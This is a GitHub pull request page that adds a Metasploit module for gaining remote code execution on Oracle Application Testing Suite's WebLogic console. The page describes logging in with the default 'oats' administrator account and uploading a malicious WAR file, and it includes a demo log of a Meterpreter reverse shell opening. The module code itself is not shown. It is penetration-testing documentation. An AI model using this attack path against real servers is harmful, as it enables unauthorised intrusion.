Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Exploit: Oracle Application Testing Suite WebLogic Server Administration Console War Deployment #11846

Merged
merged 10 commits into from May 24, 2019

Conversation

Projects
None yet
4 participants
@wchen-r7
Copy link
Contributor

commented May 16, 2019

Background

This module abuses a feature in Oracle Application Testing Suite WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a "oats" account that you could log in with, which grants you administrator access.

Setup

The following is the exact setup I used to test and analyze the vulnerability:

  • Windows Server 2008 R2 x64 (other Windows systems are also supported)
    • .Net Framework 3.5 enabled (from add/remove features)
    • IE ESC (from Server Manager) disabled
    • 8GB of RAM (at least more than 4GB will be used to run OATS)
    • Duel-Core processor
  • oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
  • Jdk-7u21-windows-x64.exe
  • OracleXE112_Win64.zip (Newer version 18c did not work well for me)
  • Firefox (I had to install this because IE on Win2k8 is completely outdated)
  • Adobe Flash installed (IE ESC needs to be disabled in order to install this)

For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.

Verification

  • Install OATS by following the instructions above
  • load the Metasploit module
  • Set the rhosts, HttpUsername, and HttpPassword
  • run

Demo

msf5 exploit(windows/http/oats_weblogic_console) > check
[*] 172.16.135.128:8088 - The target service is running, but could not be validated.
msf5 exploit(windows/http/oats_weblogic_console) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as oats:VeryPhat1337
[*] Ready for war. Codename "lawrence" at 6256 bytes
[*] FRSC value: 0x59c5c771ae7d83c8440d7c45d2610dca5a0aa304a9e89e4c
[*] Server replies: "The file lawrence.war has been uploaded successfully to C:\\OracleATS\\oats\\servers\\AdminServer\\upload"
[+] Operation "lawrence" is a go!
[*] Code 200 on "lawrence" request
[*] Sending stage (53866 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49337) at 2019-05-18 18:07:27 -0500
[+] Successfully undeployed lawrence.war

meterpreter >

@jrobles-r7 jrobles-r7 self-assigned this May 21, 2019

@jrobles-r7 jrobles-r7 merged commit fcd3608 into rapid7:master May 24, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request May 24, 2019

msjenkins-r7 added a commit that referenced this pull request May 24, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented May 24, 2019

Release Notes

The oats_weblogic_console module abuses a feature in Oracle Application Testing Suite WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.